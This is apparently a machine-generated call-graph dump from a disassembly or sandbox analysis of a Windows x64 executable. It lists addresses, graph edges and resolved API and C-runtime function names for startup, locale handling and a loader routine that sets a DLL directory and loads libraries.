7ff7e12dd5fc _fread_nolock 12 API calls 19068->19070 19069->19065 19071 7ff7e12e29c7 19070->19071 19072 7ff7e12e29cf 19071->19072 19073 7ff7e12e29d8 19071->19073 19074 7ff7e12da948 __free_lconv_num 11 API calls 19072->19074 19075 7ff7e12e07e8 WideCharToMultiByte 19073->19075 19076 7ff7e12e29d6 19074->19076 19077 7ff7e12e29fb 19075->19077 19076->19069 19078 7ff7e12e29ff 19077->19078 19079 7ff7e12e2a09 19077->19079 19080 7ff7e12da948 __free_lconv_num 11 API calls 19078->19080 19081 7ff7e12da948 __free_lconv_num 11 API calls 19079->19081 19082 7ff7e12e2a07 FreeEnvironmentStringsW 19080->19082 19081->19082 19082->19065 19085 7ff7e12d92a1 19084->19085 19086 7ff7e12deb98 _set_fmode 11 API calls 19085->19086 19087 7ff7e12d92d7 19086->19087 19089 7ff7e12d9352 19087->19089 19092 7ff7e12deb98 _set_fmode 11 API calls 19087->19092 19093 7ff7e12d9341 19087->19093 19095 7ff7e12da4a4 __std_exception_copy 37 API calls 19087->19095 19097 7ff7e12d9377 19087->19097 19099 7ff7e12da948 __free_lconv_num 11 API calls 19087->19099 19100 7ff7e12d92df 19087->19100 19088 7ff7e12da948 __free_lconv_num 11 API calls 19090 7ff7e12d91d7 19088->19090 19091 7ff7e12da948 __free_lconv_num 11 API calls 19089->19091 19090->19047 19091->19090 19092->19087 19262 7ff7e12d94a8 19093->19262 19095->19087 19101 7ff7e12da900 _isindst 17 API calls 19097->19101 19098 7ff7e12da948 __free_lconv_num 11 API calls 19098->19100 19099->19087 19100->19088 19102 7ff7e12d938a 19101->19102 19104 7ff7e12db235 FlsGetValue 19103->19104 19105 7ff7e12db250 FlsSetValue 19103->19105 19106 7ff7e12db242 19104->19106 19107 7ff7e12db24a 19104->19107 19105->19106 19108 7ff7e12db25d 19105->19108 19110 7ff7e12db248 19106->19110 19111 7ff7e12da504 _CreateFrameInfo 45 API calls 19106->19111 19107->19105 19109 7ff7e12deb98 _set_fmode 11 API calls 19108->19109 19112 7ff7e12db26c 19109->19112 19123 7ff7e12e22c4 19110->19123 19113 7ff7e12db2c5 19111->19113 19114 7ff7e12db28a FlsSetValue 19112->19114 19115 7ff7e12db27a FlsSetValue 19112->19115 19117 7ff7e12db296 FlsSetValue 19114->19117 19118 7ff7e12db2a8 19114->19118 19116 7ff7e12db283 19115->19116 19119 7ff7e12da948 __free_lconv_num 11 API calls 19116->19119 19117->19116 19120 7ff7e12daef4 _set_fmode 11 API calls 19118->19120 19119->19106 19121 7ff7e12db2b0 19120->19121 19122 7ff7e12da948 __free_lconv_num 11 API calls 19121->19122 19122->19110 19146 7ff7e12e2534 19123->19146 19125 7ff7e12e22f9 19161 7ff7e12e1fc4 19125->19161 19128 7ff7e12dd5fc _fread_nolock 12 API calls 19129 7ff7e12e2327 19128->19129 19130 7ff7e12e232f 19129->19130 19132 7ff7e12e233e 19129->19132 19131 7ff7e12da948 __free_lconv_num 11 API calls 19130->19131 19145 7ff7e12e2316 19131->19145 19132->19132 19168 7ff7e12e266c 19132->19168 19135 7ff7e12e243a 19136 7ff7e12d4f08 _set_fmode 11 API calls 19135->19136 19137 7ff7e12e243f 19136->19137 19141 7ff7e12da948 __free_lconv_num 11 API calls 19137->19141 19138 7ff7e12e2495 19140 7ff7e12e24fc 19138->19140 19179 7ff7e12e1df4 19138->19179 19139 7ff7e12e2454 19139->19138 19142 7ff7e12da948 __free_lconv_num 11 API calls 19139->19142 19144 7ff7e12da948 __free_lconv_num 11 API calls 19140->19144 19141->19145 19142->19138 19144->19145 19145->19060 19147 7ff7e12e2557 19146->19147 19148 7ff7e12e2561 19147->19148 19194 7ff7e12e02d8 EnterCriticalSection 19147->19194 19150 7ff7e12e25d3 19148->19150 19151 7ff7e12da504 _CreateFrameInfo 45 API calls 19148->19151 19150->19125 19154 7ff7e12e25eb 19151->19154 19156 7ff7e12e2642 19154->19156 19158 7ff7e12db224 50 API calls 19154->19158 19156->19125 19159 7ff7e12e262c 19158->19159 19160 7ff7e12e22c4 65 API calls 19159->19160 19160->19156 19162 7ff7e12d4f4c 45 API calls 19161->19162 19163 7ff7e12e1fd8 19162->19163 19164 7ff7e12e1fe4 GetOEMCP 19163->19164 19165 7ff7e12e1ff6 19163->19165 19166 7ff7e12e200b 19164->19166 19165->19166 19167 7ff7e12e1ffb GetACP 19165->19167 19166->19128 19166->19145 19167->19166 19169 7ff7e12e1fc4 47 API calls 19168->19169 19170 7ff7e12e2699 19169->19170 19171 7ff7e12e27ef 19170->19171 19173 7ff7e12e26d6 IsValidCodePage 19170->19173 19177 7ff7e12e26f0 __scrt_get_show_window_mode 19170->19177 19172 7ff7e12cc550 _log10_special 8 API calls 19171->19172 19174 7ff7e12e2431 19172->19174 19173->19171 19175 7ff7e12e26e7 19173->19175 19174->19135 19174->19139 19176 7ff7e12e2716 GetCPInfo 19175->19176 19175->19177 19176->19171 19176->19177 19195 7ff7e12e20dc 19177->19195 19261 7ff7e12e02d8 EnterCriticalSection 19179->19261 19196 7ff7e12e2119 GetCPInfo 19195->19196 19197 7ff7e12e220f 19195->19197 19196->19197 19202 7ff7e12e212c 19196->19202 19198 7ff7e12cc550 _log10_special 8 API calls 19197->19198 19199 7ff7e12e22ae 19198->19199 19199->19171 19200 7ff7e12e2e40 48 API calls 19201 7ff7e12e21a3 19200->19201 19206 7ff7e12e7b84 19201->19206 19202->19200 19205 7ff7e12e7b84 54 API calls 19205->19197 19207 7ff7e12d4f4c 45 API calls 19206->19207 19208 7ff7e12e7ba9 19207->19208 19211 7ff7e12e7850 19208->19211 19212 7ff7e12e7891 19211->19212 19213 7ff7e12df8a0 _fread_nolock MultiByteToWideChar 19212->19213 19216 7ff7e12e78db 19213->19216 19214 7ff7e12cc550 _log10_special 8 API calls 19215 7ff7e12e21d6 19214->19215 19215->19205 19217 7ff7e12dd5fc _fread_nolock 12 API calls 19216->19217 19218 7ff7e12e7a11 19216->19218 19219 7ff7e12e7b59 19216->19219 19220 7ff7e12e7913 19216->19220 19217->19220 19218->19219 19221 7ff7e12da948 __free_lconv_num 11 API calls 19218->19221 19219->19214 19220->19218 19222 7ff7e12df8a0 _fread_nolock MultiByteToWideChar 19220->19222 19221->19219 19223 7ff7e12e7986 19222->19223 19223->19218 19242 7ff7e12df0e4 19223->19242 19226 7ff7e12e7a22 19228 7ff7e12dd5fc _fread_nolock 12 API calls 19226->19228 19230 7ff7e12e7af4 19226->19230 19232 7ff7e12e7a40 19226->19232 19227 7ff7e12e79d1 19227->19218 19229 7ff7e12df0e4 __crtLCMapStringW 6 API calls 19227->19229 19228->19232 19229->19218 19230->19218 19231 7ff7e12da948 __free_lconv_num 11 API calls 19230->19231 19231->19218 19232->19218 19233 7ff7e12df0e4 __crtLCMapStringW 6 API calls 19232->19233 19234 7ff7e12e7ac0 19233->19234 19234->19230 19235 7ff7e12e7af6 19234->19235 19236 7ff7e12e7ae0 19234->19236 19238 7ff7e12e07e8 WideCharToMultiByte 19235->19238 19237 7ff7e12e07e8 WideCharToMultiByte 19236->19237 19239 7ff7e12e7aee 19237->19239 19238->19239 19239->19230 19240 7ff7e12e7b0e 19239->19240 19240->19218 19241 7ff7e12da948 __free_lconv_num 11 API calls 19240->19241 19241->19218 19248 7ff7e12ded10 19242->19248 19245 7ff7e12df12a 19245->19218 19245->19226 19245->19227 19247 7ff7e12df193 LCMapStringW 19247->19245 19249 7ff7e12ded68 __vcrt_FlsAlloc 19248->19249 19250 7ff7e12ded6d 19248->19250 19249->19250 19251 7ff7e12ded9d LoadLibraryExW 19249->19251 19252 7ff7e12dee92 GetProcAddress 19249->19252 19257 7ff7e12dedfc LoadLibraryExW 19249->19257 19250->19245 19258 7ff7e12df1d0 19250->19258 19253 7ff7e12dee72 19251->19253 19254 7ff7e12dedc2 GetLastError 19251->19254 19252->19250 19256 7ff7e12deea3 19252->19256 19253->19252 19255 7ff7e12dee89 FreeLibrary 19253->19255 19254->19249 19255->19252 19256->19250 19257->19249 19257->19253 19259 7ff7e12ded10 __crtLCMapStringW 5 API calls 19258->19259 19260 7ff7e12df1fe __crtLCMapStringW 19259->19260 19260->19247 19266 7ff7e12d94ad 19262->19266 19267 7ff7e12d9349 19262->19267 19263 7ff7e12d94d6 19265 7ff7e12da948 __free_lconv_num 11 API calls 19263->19265 19264 7ff7e12da948 __free_lconv_num 11 API calls 19264->19266 19265->19267 19266->19263 19266->19264 19267->19098 19269 7ff7e12e62c1 19268->19269 19270 7ff7e12e62d8 19268->19270 19271 7ff7e12d4f08 _set_fmode 11 API calls 19269->19271 19270->19269 19273 7ff7e12e62e6 19270->19273 19272 7ff7e12e62c6 19271->19272 19274 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 19272->19274 19275 7ff7e12d4f4c 45 API calls 19273->19275 19276 7ff7e12e62d1 19273->19276 19274->19276 19275->19276 19276->18959 19278 7ff7e12d4f4c 45 API calls 19277->19278 19279 7ff7e12e8f71 19278->19279 19282 7ff7e12e8bc8 19279->19282 19284 7ff7e12e8c16 19282->19284 19283 7ff7e12cc550 _log10_special 8 API calls 19285 7ff7e12e7205 19283->19285 19286 7ff7e12e8c9d 19284->19286 19288 7ff7e12e8c88 GetCPInfo 19284->19288 19290 7ff7e12e8ca1 19284->19290 19285->18959 19285->18961 19287 7ff7e12df8a0 _fread_nolock MultiByteToWideChar 19286->19287 19286->19290 19289 7ff7e12e8d35 19287->19289 19288->19286 19288->19290 19289->19290 19291 7ff7e12dd5fc _fread_nolock 12 API calls 19289->19291 19292 7ff7e12e8d6c 19289->19292 19290->19283 19291->19292 19292->19290 19293 7ff7e12df8a0 _fread_nolock MultiByteToWideChar 19292->19293 19294 7ff7e12e8dda 19293->19294 19295 7ff7e12e8ebc 19294->19295 19296 7ff7e12df8a0 _fread_nolock MultiByteToWideChar 19294->19296 19295->19290 19297 7ff7e12da948 __free_lconv_num 11 API calls 19295->19297 19298 7ff7e12e8e00 19296->19298 19297->19290 19298->19295 19299 7ff7e12dd5fc _fread_nolock 12 API calls 19298->19299 19300 7ff7e12e8e2d 19298->19300 19299->19300 19300->19295 19301 7ff7e12df8a0 _fread_nolock MultiByteToWideChar 19300->19301 19302 7ff7e12e8ea4 19301->19302 19303 7ff7e12e8ec4 19302->19303 19304 7ff7e12e8eaa 19302->19304 19311 7ff7e12def68 19303->19311 19304->19295 19307 7ff7e12da948 __free_lconv_num 11 API calls 19304->19307 19307->19295 19308 7ff7e12e8f03 19308->19290 19310 7ff7e12da948 __free_lconv_num 11 API calls 19308->19310 19309 7ff7e12da948 __free_lconv_num 11 API calls 19309->19308 19310->19290 19312 7ff7e12ded10 __crtLCMapStringW 5 API calls 19311->19312 19313 7ff7e12defa6 19312->19313 19314 7ff7e12defae 19313->19314 19315 7ff7e12df1d0 __crtLCMapStringW 5 API calls 19313->19315 19314->19308 19314->19309 19316 7ff7e12df017 CompareStringW 19315->19316 19316->19314 19318 7ff7e12e7c41 19317->19318 19319 7ff7e12e7c5a HeapSize 19317->19319 19320 7ff7e12d4f08 _set_fmode 11 API calls 19318->19320 19321 7ff7e12e7c46 19320->19321 19322 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 19321->19322 19323 7ff7e12e7c51 19322->19323 19323->18966 19325 7ff7e12e7c93 19324->19325 19326 7ff7e12e7c89 19324->19326 19328 7ff7e12e7c98 19325->19328 19334 7ff7e12e7c9f _set_fmode 19325->19334 19327 7ff7e12dd5fc _fread_nolock 12 API calls 19326->19327 19332 7ff7e12e7c91 19327->19332 19329 7ff7e12da948 __free_lconv_num 11 API calls 19328->19329 19329->19332 19330 7ff7e12e7ca5 19333 7ff7e12d4f08 _set_fmode 11 API calls 19330->19333 19331 7ff7e12e7cd2 HeapReAlloc 19331->19332 19331->19334 19332->18969 19333->19332 19334->19330 19334->19331 19335 7ff7e12e3590 _set_fmode 2 API calls 19334->19335 19335->19334 19337 7ff7e12ded10 __crtLCMapStringW 5 API calls 19336->19337 19338 7ff7e12def44 19337->19338 19338->18974 19340 7ff7e12d54d6 19339->19340 19341 7ff7e12d54fa 19339->19341 19345 7ff7e12da948 __free_lconv_num 11 API calls 19340->19345 19348 7ff7e12d54e5 19340->19348 19342 7ff7e12d5554 19341->19342 19343 7ff7e12d54ff 19341->19343 19344 7ff7e12df8a0 _fread_nolock MultiByteToWideChar 19342->19344 19346 7ff7e12d5514 19343->19346 19343->19348 19349 7ff7e12da948 __free_lconv_num 11 API calls 19343->19349 19355 7ff7e12d5570 19344->19355 19345->19348 19350 7ff7e12dd5fc _fread_nolock 12 API calls 19346->19350 19347 7ff7e12d5577 GetLastError 19351 7ff7e12d4e7c _fread_nolock 11 API calls 19347->19351 19348->18978 19348->18979 19349->19346 19350->19348 19354 7ff7e12d5584 19351->19354 19352 7ff7e12d55b2 19352->19348 19353 7ff7e12df8a0 _fread_nolock MultiByteToWideChar 19352->19353 19357 7ff7e12d55f6 19353->19357 19358 7ff7e12d4f08 _set_fmode 11 API calls 19354->19358 19355->19347 19355->19352 19356 7ff7e12d55a5 19355->19356 19359 7ff7e12da948 __free_lconv_num 11 API calls 19355->19359 19360 7ff7e12dd5fc _fread_nolock 12 API calls 19356->19360 19357->19347 19357->19348 19358->19348 19359->19356 19360->19352 19362 7ff7e12d9225 19361->19362 19363 7ff7e12d9221 19361->19363 19382 7ff7e12e2a3c GetEnvironmentStringsW 19362->19382 19363->19006 19374 7ff7e12d95cc 19363->19374 19366 7ff7e12d9232 19368 7ff7e12da948 __free_lconv_num 11 API calls 19366->19368 19367 7ff7e12d923e 19389 7ff7e12d938c 19367->19389 19368->19363 19371 7ff7e12da948 __free_lconv_num 11 API calls 19372 7ff7e12d9265 19371->19372 19373 7ff7e12da948 __free_lconv_num 11 API calls 19372->19373 19373->19363 19375 7ff7e12d95ef 19374->19375 19380 7ff7e12d9606 19374->19380 19375->19006 19376 7ff7e12df8a0 MultiByteToWideChar _fread_nolock 19376->19380 19377 7ff7e12deb98 _set_fmode 11 API calls 19377->19380 19378 7ff7e12d967a 19379 7ff7e12da948 __free_lconv_num 11 API calls 19378->19379 19379->19375 19380->19375 19380->19376 19380->19377 19380->19378 19381 7ff7e12da948 __free_lconv_num 11 API calls 19380->19381 19381->19380 19383 7ff7e12d922a 19382->19383 19384 7ff7e12e2a60 19382->19384 19383->19366 19383->19367 19385 7ff7e12dd5fc _fread_nolock 12 API calls 19384->19385 19386 7ff7e12e2a97 memcpy_s 19385->19386 19387 7ff7e12da948 __free_lconv_num 11 API calls 19386->19387 19388 7ff7e12e2ab7 FreeEnvironmentStringsW 19387->19388 19388->19383 19390 7ff7e12d93b4 19389->19390 19391 7ff7e12deb98 _set_fmode 11 API calls 19390->19391 19400 7ff7e12d93ef 19391->19400 19392 7ff7e12da948 __free_lconv_num 11 API calls 19393 7ff7e12d9246 19392->19393 19393->19371 19394 7ff7e12d9471 19395 7ff7e12da948 __free_lconv_num 11 API calls 19394->19395 19395->19393 19396 7ff7e12deb98 _set_fmode 11 API calls 19396->19400 19397 7ff7e12d9460 19399 7ff7e12d94a8 11 API calls 19397->19399 19398 7ff7e12e0474 37 API calls 19398->19400 19401 7ff7e12d9468 19399->19401 19400->19394 19400->19396 19400->19397 19400->19398 19402 7ff7e12d9494 19400->19402 19405 7ff7e12da948 __free_lconv_num 11 API calls 19400->19405 19406 7ff7e12d93f7 19400->19406 19403 7ff7e12da948 __free_lconv_num 11 API calls 19401->19403 19404 7ff7e12da900 _isindst 17 API calls 19402->19404 19403->19406 19407 7ff7e12d94a6 19404->19407 19405->19400 19406->19392 19410 7ff7e12e8b31 __crtLCMapStringW 19408->19410 19409 7ff7e12e70ee 19409->19033 19409->19034 19410->19409 19411 7ff7e12def68 6 API calls 19410->19411 19411->19409 16176 7ff7e12ccc3c 16197 7ff7e12cce0c 16176->16197 16179 7ff7e12ccd88 16351 7ff7e12cd12c IsProcessorFeaturePresent 16179->16351 16180 7ff7e12ccc58 __scrt_acquire_startup_lock 16182 7ff7e12ccd92 16180->16182 16189 7ff7e12ccc76 __scrt_release_startup_lock 16180->16189 16183 7ff7e12cd12c 7 API calls 16182->16183 16185 7ff7e12ccd9d _CreateFrameInfo 16183->16185 16184 7ff7e12ccc9b 16186 7ff7e12ccd21 16203 7ff7e12cd274 16186->16203 16188 7ff7e12ccd26 16206 7ff7e12c1000 16188->16206 16189->16184 16189->16186 16340 7ff7e12d9b2c 16189->16340 16194 7ff7e12ccd49 16194->16185 16347 7ff7e12ccf90 16194->16347 16198 7ff7e12cce14 16197->16198 16199 7ff7e12cce20 __scrt_dllmain_crt_thread_attach 16198->16199 16200 7ff7e12ccc50 16199->16200 16201 7ff7e12cce2d 16199->16201 16200->16179 16200->16180 16201->16200 16358 7ff7e12cd888 16201->16358 16385 7ff7e12ea4d0 16203->16385 16207 7ff7e12c1009 16206->16207 16387 7ff7e12d5484 16207->16387 16209 7ff7e12c37fb 16394 7ff7e12c36b0 16209->16394 16213 7ff7e12cc550 _log10_special 8 API calls 16215 7ff7e12c3ca7 16213->16215 16345 7ff7e12cd2b8 GetModuleHandleW 16215->16345 16216 7ff7e12c383c 16561 7ff7e12c1c80 16216->16561 16217 7ff7e12c391b 16570 7ff7e12c45c0 16217->16570 16221 7ff7e12c385b 16466 7ff7e12c8830 16221->16466 16222 7ff7e12c396a 16593 7ff7e12c2710 16222->16593 16226 7ff7e12c388e 16233 7ff7e12c38bb __std_exception_copy 16226->16233 16565 7ff7e12c89a0 16226->16565 16227 7ff7e12c395d 16228 7ff7e12c3962 16227->16228 16229 7ff7e12c3984 16227->16229 16589 7ff7e12d004c 16228->16589 16232 7ff7e12c1c80 49 API calls 16229->16232 16234 7ff7e12c39a3 16232->16234 16235 7ff7e12c8830 14 API calls 16233->16235 16243 7ff7e12c38de __std_exception_copy 16233->16243 16238 7ff7e12c1950 115 API calls 16234->16238 16235->16243 16236 7ff7e12c8940 40 API calls 16237 7ff7e12c3a0b 16236->16237 16239 7ff7e12c89a0 40 API calls 16237->16239 16240 7ff7e12c39ce 16238->16240 16241 7ff7e12c3a17 16239->16241 16240->16221 16242 7ff7e12c39de 16240->16242 16244 7ff7e12c89a0 40 API calls 16241->16244 16245 7ff7e12c2710 54 API calls 16242->16245 16243->16236 16248 7ff7e12c390e __std_exception_copy 16243->16248 16246 7ff7e12c3a23 16244->16246 16287 7ff7e12c3808 __std_exception_copy 16245->16287 16247 7ff7e12c89a0 40 API calls 16246->16247 16247->16248 16249 7ff7e12c8830 14 API calls 16248->16249 16250 7ff7e12c3a3b 16249->16250 16251 7ff7e12c3b2f 16250->16251 16252 7ff7e12c3a60 __std_exception_copy 16250->16252 16253 7ff7e12c2710 54 API calls 16251->16253 16262 7ff7e12c3aab 16252->16262 16479 7ff7e12c8940 16252->16479 16253->16287 16255 7ff7e12c8830 14 API calls 16256 7ff7e12c3bf4 __std_exception_copy 16255->16256 16257 7ff7e12c3d41 16256->16257 16258 7ff7e12c3c46 16256->16258 16604 7ff7e12c44e0 16257->16604 16259 7ff7e12c3c50 16258->16259 16260 7ff7e12c3cd4 16258->16260 16486 7ff7e12c90e0 16259->16486 16264 7ff7e12c8830 14 API calls 16260->16264 16262->16255 16267 7ff7e12c3ce0 16264->16267 16265 7ff7e12c3d4f 16268 7ff7e12c3d71 16265->16268 16269 7ff7e12c3d65 16265->16269 16271 7ff7e12c3c61 16267->16271 16274 7ff7e12c3ced 16267->16274 16270 7ff7e12c1c80 49 API calls 16268->16270 16607 7ff7e12c4630 16269->16607 16282 7ff7e12c3cc8 __std_exception_copy 16270->16282 16277 7ff7e12c2710 54 API calls 16271->16277 16278 7ff7e12c1c80 49 API calls 16274->16278 16275 7ff7e12c3dc4 16536 7ff7e12c9390 16275->16536 16277->16287 16280 7ff7e12c3d0b 16278->16280 16281 7ff7e12c3d12 16280->16281 16280->16282 16285 7ff7e12c2710 54 API calls 16281->16285 16282->16275 16283 7ff7e12c3da7 SetDllDirectoryW LoadLibraryExW 16282->16283 16283->16275 16284 7ff7e12c3dd7 SetDllDirectoryW 16288 7ff7e12c3e0a 16284->16288 16329 7ff7e12c3e5a 16284->16329 16285->16287 16287->16213 16290 7ff7e12c8830 14 API calls 16288->16290 16289 7ff7e12c4008 16292 7ff7e12c4012 PostMessageW GetMessageW 16289->16292 16293 7ff7e12c4035 16289->16293 16296 7ff7e12c3e16 __std_exception_copy 16290->16296 16291 7ff7e12c3f1b 16541 7ff7e12c33c0 16291->16541 16292->16293 16684 7ff7e12c3360 16293->16684 16298 7ff7e12c3ef2 16296->16298 16303 7ff7e12c3e4e 16296->16303 16302 7ff7e12c8940 40 API calls 16298->16302 16302->16329 16303->16329 16610 7ff7e12c6dc0 16303->16610 16329->16289 16329->16291 16341 7ff7e12d9b64 16340->16341 16342 7ff7e12d9b43 16340->16342 16343 7ff7e12da3d8 45 API calls 16341->16343 16342->16186 16344 7ff7e12d9b69 16343->16344 16346 7ff7e12cd2c9 16345->16346 16346->16194 16348 7ff7e12ccfa1 16347->16348 16349 7ff7e12ccd60 16348->16349 16350 7ff7e12cd888 7 API calls 16348->16350 16349->16184 16350->16349 16352 7ff7e12cd152 _CreateFrameInfo __scrt_get_show_window_mode 16351->16352 16353 7ff7e12cd171 RtlCaptureContext RtlLookupFunctionEntry 16352->16353 16354 7ff7e12cd19a RtlVirtualUnwind 16353->16354 16355 7ff7e12cd1d6 __scrt_get_show_window_mode 16353->16355 16354->16355 16356 7ff7e12cd208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16355->16356 16357 7ff7e12cd256 _CreateFrameInfo 16356->16357 16357->16182 16359 7ff7e12cd890 16358->16359 16360 7ff7e12cd89a 16358->16360 16364 7ff7e12cdc24 16359->16364 16360->16200 16365 7ff7e12cdc33 16364->16365 16366 7ff7e12cd895 16364->16366 16372 7ff7e12cde60 16365->16372 16368 7ff7e12cdc90 16366->16368 16369 7ff7e12cdcbb 16368->16369 16370 7ff7e12cdcbf 16369->16370 16371 7ff7e12cdc9e DeleteCriticalSection 16369->16371 16370->16360 16371->16369 16376 7ff7e12cdcc8 16372->16376 16381 7ff7e12cddb2 TlsFree 16376->16381 16382 7ff7e12cdd0c __vcrt_FlsAlloc 16376->16382 16377 7ff7e12cdd3a LoadLibraryExW 16379 7ff7e12cdd5b GetLastError 16377->16379 16380 7ff7e12cddd9 16377->16380 16378 7ff7e12cddf9 GetProcAddress 16378->16381 16379->16382 16380->16378 16383 7ff7e12cddf0 FreeLibrary 16380->16383 16382->16377 16382->16378 16382->16381 16384 7ff7e12cdd7d LoadLibraryExW 16382->16384 16383->16378 16384->16380 16384->16382 16386 7ff7e12cd28b GetStartupInfoW 16385->16386 16386->16188 16390 7ff7e12df480 16387->16390 16388 7ff7e12df4d3 16389 7ff7e12da814 _invalid_parameter_noinfo 37 API calls 16388->16389 16393 7ff7e12df4fc 16389->16393 16390->16388 16391 7ff7e12df526 16390->16391 16697 7ff7e12df358 16391->16697 16393->16209 16705 7ff7e12cc850 16394->16705 16396 7ff7e12c36bc GetModuleFileNameW 16397 7ff7e12c3710 16396->16397 16398 7ff7e12c36eb GetLastError 16396->16398 16707 7ff7e12c9280 FindFirstFileExW 16397->16707 16712 7ff7e12c2c50 16398->16712 16402 7ff7e12c3723 16727 7ff7e12c9300 CreateFileW 16402->16727 16403 7ff7e12c377d 16738 7ff7e12c9440 16403->16738 16405 7ff7e12cc550 _log10_special 8 API calls 16408 7ff7e12c37b5 16405->16408 16407 7ff7e12c378b 16412 7ff7e12c2810 49 API calls 16407->16412 16415 7ff7e12c3706 16407->16415 16408->16287 16416 7ff7e12c1950 16408->16416 16410 7ff7e12c3734 16730 7ff7e12c2810 16410->16730 16411 7ff7e12c374c __vcrt_FlsAlloc 16411->16403 16412->16415 16415->16405 16417 7ff7e12c45c0 108 API calls 16416->16417 16418 7ff7e12c1985 16417->16418 16419 7ff7e12c1c43 16418->16419 16421 7ff7e12c7f90 83 API calls 16418->16421 16420 7ff7e12cc550 _log10_special 8 API calls 16419->16420 16422 7ff7e12c1c5e 16420->16422 16423 7ff7e12c19cb 16421->16423 16422->16216 16422->16217 16465 7ff7e12c1a03 16423->16465 17111 7ff7e12d06d4 16423->17111 16425 7ff7e12d004c 74 API calls 16425->16419 16426 7ff7e12c19e5 16427 7ff7e12c19e9 16426->16427 16428 7ff7e12c1a08 16426->16428 16429 7ff7e12d4f08 _set_fmode 11 API calls 16427->16429 17115 7ff7e12d039c 16428->17115 16431 7ff7e12c19ee 16429->16431 17118 7ff7e12c2910 16431->17118 16434 7ff7e12c1a26 16436 7ff7e12d4f08 _set_fmode 11 API calls 16434->16436 16435 7ff7e12c1a45 16439 7ff7e12c1a5c 16435->16439 16440 7ff7e12c1a7b 16435->16440 16437 7ff7e12c1a2b 16436->16437 16438 7ff7e12c2910 54 API calls 16437->16438 16438->16465 16441 7ff7e12d4f08 _set_fmode 11 API calls 16439->16441 16442 7ff7e12c1c80 49 API calls 16440->16442 16443 7ff7e12c1a61 16441->16443 16444 7ff7e12c1a92 16442->16444 16445 7ff7e12c2910 54 API calls 16443->16445 16446 7ff7e12c1c80 49 API calls 16444->16446 16445->16465 16447 7ff7e12c1add 16446->16447 16448 7ff7e12d06d4 73 API calls 16447->16448 16449 7ff7e12c1b01 16448->16449 16450 7ff7e12c1b16 16449->16450 16451 7ff7e12c1b35 16449->16451 16453 7ff7e12d4f08 _set_fmode 11 API calls 16450->16453 16452 7ff7e12d039c _fread_nolock 53 API calls 16451->16452 16454 7ff7e12c1b4a 16452->16454 16455 7ff7e12c1b1b 16453->16455 16457 7ff7e12c1b50 16454->16457 16458 7ff7e12c1b6f 16454->16458 16456 7ff7e12c2910 54 API calls 16455->16456 16456->16465 16459 7ff7e12d4f08 _set_fmode 11 API calls 16457->16459 17133 7ff7e12d0110 16458->17133 16461 7ff7e12c1b55 16459->16461 16463 7ff7e12c2910 54 API calls 16461->16463 16463->16465 16464 7ff7e12c2710 54 API calls 16464->16465 16465->16425 16467 7ff7e12c883a 16466->16467 16468 7ff7e12c9390 2 API calls 16467->16468 16469 7ff7e12c8859 GetEnvironmentVariableW 16468->16469 16470 7ff7e12c8876 ExpandEnvironmentStringsW 16469->16470 16471 7ff7e12c88c2 16469->16471 16470->16471 16473 7ff7e12c8898 16470->16473 16472 7ff7e12cc550 _log10_special 8 API calls 16471->16472 16474 7ff7e12c88d4 16472->16474 16475 7ff7e12c9440 2 API calls 16473->16475 16474->16226 16476 7ff7e12c88aa 16475->16476 16477 7ff7e12cc550 _log10_special 8 API calls 16476->16477 16478 7ff7e12c88ba 16477->16478 16478->16226 16480 7ff7e12c9390 2 API calls 16479->16480 16481 7ff7e12c895c 16480->16481 16482 7ff7e12c9390 2 API calls 16481->16482 16483 7ff7e12c896c 16482->16483 17351 7ff7e12d8238 16483->17351 16485 7ff7e12c897a __std_exception_copy 16485->16262 16487 7ff7e12c90f5 16486->16487 17369 7ff7e12c8570 GetCurrentProcess OpenProcessToken 16487->17369 16490 7ff7e12c8570 7 API calls 16491 7ff7e12c9121 16490->16491 16492 7ff7e12c9154 16491->16492 16493 7ff7e12c913a 16491->16493 16495 7ff7e12c26b0 48 API calls 16492->16495 16494 7ff7e12c26b0 48 API calls 16493->16494 16496 7ff7e12c9152 16494->16496 16497 7ff7e12c9167 LocalFree LocalFree 16495->16497 16496->16497 16498 7ff7e12c9183 16497->16498 16501 7ff7e12c918f 16497->16501 17379 7ff7e12c2b50 16498->17379 16500 7ff7e12cc550 _log10_special 8 API calls 16502 7ff7e12c3c55 16500->16502 16501->16500 16502->16271 16503 7ff7e12c8660 16502->16503 16504 7ff7e12c8678 16503->16504 16505 7ff7e12c869c 16504->16505 16506 7ff7e12c86fa GetTempPathW GetCurrentProcessId 16504->16506 16508 7ff7e12c8830 14 API calls 16505->16508 17388 7ff7e12c25c0 16506->17388 16510 7ff7e12c86a8 16508->16510 16509 7ff7e12c8728 __std_exception_copy 16522 7ff7e12c8765 __std_exception_copy 16509->16522 17392 7ff7e12d8b68 16509->17392 17395 7ff7e12c81d0 16510->17395 16516 7ff7e12d8238 38 API calls 16517 7ff7e12c86e8 __std_exception_copy 16535 7ff7e12c87d4 __std_exception_copy 16517->16535 16521 7ff7e12cc550 _log10_special 8 API calls 16524 7ff7e12c3cbb 16521->16524 16527 7ff7e12c9390 2 API calls 16522->16527 16522->16535 16524->16271 16524->16282 16528 7ff7e12c87b1 16527->16528 16529 7ff7e12c87b6 16528->16529 16530 7ff7e12c87e9 16528->16530 16532 7ff7e12c9390 2 API calls 16529->16532 16531 7ff7e12d8238 38 API calls 16530->16531 16531->16535 16533 7ff7e12c87c6 16532->16533 16534 7ff7e12d8238 38 API calls 16533->16534 16534->16535 16535->16521 16537 7ff7e12c93d6 16536->16537 16538 7ff7e12c93b2 MultiByteToWideChar 16536->16538 16539 7ff7e12c93f3 MultiByteToWideChar 16537->16539 16540 7ff7e12c93ec __std_exception_copy 16537->16540 16538->16537 16538->16540 16539->16540 16540->16284 16545 7ff7e12c33ce __scrt_get_show_window_mode 16541->16545 16542 7ff7e12c35c7 16543 7ff7e12cc550 _log10_special 8 API calls 16542->16543 16544 7ff7e12c3664 16543->16544 16544->16287 16560 7ff7e12c90c0 LocalFree 16544->16560 16545->16542 16547 7ff7e12c1c80 49 API calls 16545->16547 16548 7ff7e12c35e2 16545->16548 16553 7ff7e12c35c9 16545->16553 16554 7ff7e12c2a50 54 API calls 16545->16554 16558 7ff7e12c35d0 16545->16558 17666 7ff7e12c4560 16545->17666 17672 7ff7e12c7e20 16545->17672 17683 7ff7e12c1600 16545->17683 17731 7ff7e12c7120 16545->17731 17735 7ff7e12c4190 16545->17735 17779 7ff7e12c4450 16545->17779 